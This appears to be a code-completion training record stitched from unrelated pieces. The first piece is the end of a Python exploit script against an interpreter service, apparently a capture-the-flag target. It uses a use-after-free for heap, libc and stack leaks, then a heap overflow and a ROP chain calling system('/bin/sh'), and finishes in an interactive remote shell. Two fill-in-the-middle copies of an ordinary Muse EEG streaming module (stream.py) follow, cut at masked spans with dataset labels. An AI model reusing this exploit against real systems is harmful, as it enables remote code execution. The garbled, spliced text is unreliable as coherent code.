elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx+len(needle):].find(needle) != -1:
raise ValueError("Multiple occurances found!")
return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
# Various Thresholds for the heuristics below
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
# Step 1: Tag every byte of the input stream with it's detected type.
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
# Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i+1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
# Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
# start and end point outside the range of equal-valued characters now.
if end - start >= Y+2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
# Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
buf = ''
last = None
for tag, value in parts:
# Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
# Step 4: Print :)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException("Server disconnected.")
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
# This code also works if n > len(self._buf)
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
# TODO maybe not make this O(n**2)...
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
# TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info("Server disconnected.")
return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert(sys.stdin.isatty())
c.setVerbose(False)
# Open a PTY and spawn a bash connected to the slave end on the remote side
code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
# Should maybe put some more functionality into the inline python code instead.
# Save current TTY settings
old_settings = termios.tcgetattr(sys.stdin.fileno())
# Put TTY into raw mode
tty.setraw(sys.stdin)
# Resize remote terminal
# Nice-to-have: also handle terminal resize
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n') # terminal echo
recvtil('READY\r\n') # command output
interact()
# Restore previous settings
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
c.send(b)
def sendline(l):
c |
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn()
| .sendline(l)
| identifier_body |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
if backend == 'auto' and which('bluetoothctl') is not None:
print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
backend = helper.resolve_backend(backend)
if backend == 'gatt':
interface = interface or 'hci0'
adapter = pygatt.GATTToolBackend(interface)
elif backend == 'bluemuse':
print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
subprocess.call('start bluemuse:', shell=True)
return
elif backend == 'bleak':
adapter = backends.BleakBackend()
elif backend == 'bgapi':
adapter = pygatt.BGAPIBackend(serial_port=interface)
try:
adapter.start()
print('Searching for Muses, this may take up to 10 seconds...')
devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
adapter.stop()
except pygatt.exceptions.BLEError as e:
if backend == 'gatt':
print('pygatt failed to scan for BLE devices. Trying with '
'bluetoothctl.')
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
else:
raise e
muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
_print_muse_list(muses)
return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
"""Identify Muse BLE devices using bluetoothctl.
When using backend='gatt' on Linux, pygatt relies on the command line tool
`hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
seems to fail on Bluetooth 5 devices. This function roughly replicates the
functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
using the more modern `bluetoothctl` tool.
Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
"""
try:
import pexpect
except (ImportError, ModuleNotFoundError):
msg = ('pexpect is currently required to use bluetoothctl from within '
'a jupter notebook environment.')
raise ModuleNotFoundError(msg)
# Run scan using pexpect as subprocess.run returns immediately in jupyter
# notebooks
print('Searching for Muses, this may take up to 10 seconds...')
scan = pexpect.spawn('bluetoothctl scan on')
try:
scan.expect('foooooo', timeout=timeout)
except pexpect.EOF:
before_eof = scan.before.decode('utf-8', 'replace')
msg = f'Unexpected error when scanning: {before_eof}'
raise ValueError(msg)
except pexpect.TIMEOUT:
if verbose:
print(scan.before.decode('utf-8', 'replace').split('\r\n'))
# List devices using bluetoothctl
list_devices_cmd = ['bluetoothctl', 'devices']
devices = subprocess.run(
list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
'utf-8').split('\n')
muses = [{
'name': re.findall('Muse.*', string=d)[0],
'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
} for d in devices if 'Muse' in d]
_print_muse_list(muses)
return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
muses = list_muses(backend)
if name:
for muse in muses:
if muse['name'] == name:
return muse
elif muses:
return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
address,
backend='auto',
interface=None,
name=None,
ppg_enabled=False,
acc_enabled=False,
gyro_enabled=False,
eeg_disabled=False,
preset=None,
disable_light=False,
timeout=AUTO_DISCONNECT_DELAY,
):
# If no data types are enabled, we warn the user and return immediately.
if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
print('Stream initiation failed: At least one data source must be enabled.')
return
# For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
if backend != 'bluemuse':
if not address:
found_muse = find_muse(name, backend)
if not found_muse:
return
else:
|
if not eeg_disabled:
eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
'Muse%s' % address)
eeg_info.desc().append_child_value("manufacturer", "Muse")
eeg_channels = eeg_info.desc().append_child("channels")
for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
eeg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "microvolts") \
.append_child_value("type", "EEG")
eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
if ppg_enabled:
ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
'float32', 'Muse%s' % address)
ppg_info.desc().append_child_value("manufacturer", "Muse")
ppg_channels = ppg_info.desc().append_child("channels")
for c in ['PPG1', 'PPG2', 'PPG3']:
ppg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "mmHg") \
.append_child_value("type", "PPG")
ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
if acc_enabled:
acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
'float32', 'Muse%s' % address)
acc_info.desc().append_child_value("manufacturer", "Muse")
acc_channels = acc_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
acc_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "g") \
.append_child_value("type", "accelerometer")
acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
if gyro_enabled:
gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
'float32', 'Muse%s' % address)
gyro_info.desc().append_child_value("manufacturer", "Muse")
gyro_channels = gyro_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
gyro_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "dps") \
.append_child_value("type", "gyroscope")
gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
def push(data, timestamps, outlet):
for ii in range(data.shape[1]):
outlet.push_sample(data[:, ii], timestamps[ii])
push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
didConnect = muse.connect()
if(didConnect):
print('Connected.')
muse.start()
eeg_string = " EEG" if not eeg_disabled else ""
ppg_string = " PPG" if ppg_enabled else ""
acc_string = " ACC" if acc_enabled else ""
gyro_string = " GYRO" if gyro_enabled else ""
print("Streaming%s%s%s%s..." %
(eeg_string, ppg_string, acc_string, gyro_string))
while time() - muse.last_timestamp < timeout:
try:
backends.sleep(1)
except KeyboardInterrupt:
muse.stop()
muse.disconnect()
break
print('Disconnected.')
# For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
else:
# Toggle all data stream types in BlueMuse.
subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
backend=backend, interface=interface, name=name)
muse.connect()
if not address and not name:
print('Targeting first device BlueMuse discovers...')
else:
print('Targeting device: '
+ ':'.join(filter(None, [name, address])) + '...')
print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
muse.start()
| address = found_muse['address']
name = found_muse['name'] | conditional_block |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
if backend == 'auto' and which('bluetoothctl') is not None:
print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
backend = helper.resolve_backend(backend)
if backend == 'gatt':
interface = interface or 'hci0'
adapter = pygatt.GATTToolBackend(interface)
elif backend == 'bluemuse':
print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
subprocess.call('start bluemuse:', shell=True)
return
elif backend == 'bleak':
adapter = backends.BleakBackend()
elif backend == 'bgapi':
adapter = pygatt.BGAPIBackend(serial_port=interface)
try:
adapter.start()
print('Searching for Muses, this may take up to 10 seconds...')
devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
adapter.stop()
except pygatt.exceptions.BLEError as e:
if backend == 'gatt':
print('pygatt failed to scan for BLE devices. Trying with '
'bluetoothctl.')
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
else:
raise e
muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
_print_muse_list(muses)
return muses
def | (timeout, verbose=False):
"""Identify Muse BLE devices using bluetoothctl.
When using backend='gatt' on Linux, pygatt relies on the command line tool
`hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
seems to fail on Bluetooth 5 devices. This function roughly replicates the
functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
using the more modern `bluetoothctl` tool.
Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
"""
try:
import pexpect
except (ImportError, ModuleNotFoundError):
msg = ('pexpect is currently required to use bluetoothctl from within '
'a jupter notebook environment.')
raise ModuleNotFoundError(msg)
# Run scan using pexpect as subprocess.run returns immediately in jupyter
# notebooks
print('Searching for Muses, this may take up to 10 seconds...')
scan = pexpect.spawn('bluetoothctl scan on')
try:
scan.expect('foooooo', timeout=timeout)
except pexpect.EOF:
before_eof = scan.before.decode('utf-8', 'replace')
msg = f'Unexpected error when scanning: {before_eof}'
raise ValueError(msg)
except pexpect.TIMEOUT:
if verbose:
print(scan.before.decode('utf-8', 'replace').split('\r\n'))
# List devices using bluetoothctl
list_devices_cmd = ['bluetoothctl', 'devices']
devices = subprocess.run(
list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
'utf-8').split('\n')
muses = [{
'name': re.findall('Muse.*', string=d)[0],
'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
} for d in devices if 'Muse' in d]
_print_muse_list(muses)
return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
muses = list_muses(backend)
if name:
for muse in muses:
if muse['name'] == name:
return muse
elif muses:
return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
address,
backend='auto',
interface=None,
name=None,
ppg_enabled=False,
acc_enabled=False,
gyro_enabled=False,
eeg_disabled=False,
preset=None,
disable_light=False,
timeout=AUTO_DISCONNECT_DELAY,
):
# If no data types are enabled, we warn the user and return immediately.
if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
print('Stream initiation failed: At least one data source must be enabled.')
return
# For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
if backend != 'bluemuse':
if not address:
found_muse = find_muse(name, backend)
if not found_muse:
return
else:
address = found_muse['address']
name = found_muse['name']
if not eeg_disabled:
eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
'Muse%s' % address)
eeg_info.desc().append_child_value("manufacturer", "Muse")
eeg_channels = eeg_info.desc().append_child("channels")
for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
eeg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "microvolts") \
.append_child_value("type", "EEG")
eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
if ppg_enabled:
ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
'float32', 'Muse%s' % address)
ppg_info.desc().append_child_value("manufacturer", "Muse")
ppg_channels = ppg_info.desc().append_child("channels")
for c in ['PPG1', 'PPG2', 'PPG3']:
ppg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "mmHg") \
.append_child_value("type", "PPG")
ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
if acc_enabled:
acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
'float32', 'Muse%s' % address)
acc_info.desc().append_child_value("manufacturer", "Muse")
acc_channels = acc_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
acc_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "g") \
.append_child_value("type", "accelerometer")
acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
if gyro_enabled:
gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
'float32', 'Muse%s' % address)
gyro_info.desc().append_child_value("manufacturer", "Muse")
gyro_channels = gyro_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
gyro_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "dps") \
.append_child_value("type", "gyroscope")
gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
def push(data, timestamps, outlet):
for ii in range(data.shape[1]):
outlet.push_sample(data[:, ii], timestamps[ii])
push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
didConnect = muse.connect()
if(didConnect):
print('Connected.')
muse.start()
eeg_string = " EEG" if not eeg_disabled else ""
ppg_string = " PPG" if ppg_enabled else ""
acc_string = " ACC" if acc_enabled else ""
gyro_string = " GYRO" if gyro_enabled else ""
print("Streaming%s%s%s%s..." %
(eeg_string, ppg_string, acc_string, gyro_string))
while time() - muse.last_timestamp < timeout:
try:
backends.sleep(1)
except KeyboardInterrupt:
muse.stop()
muse.disconnect()
break
print('Disconnected.')
# For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
else:
# Toggle all data stream types in BlueMuse.
subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
backend=backend, interface=interface, name=name)
muse.connect()
if not address and not name:
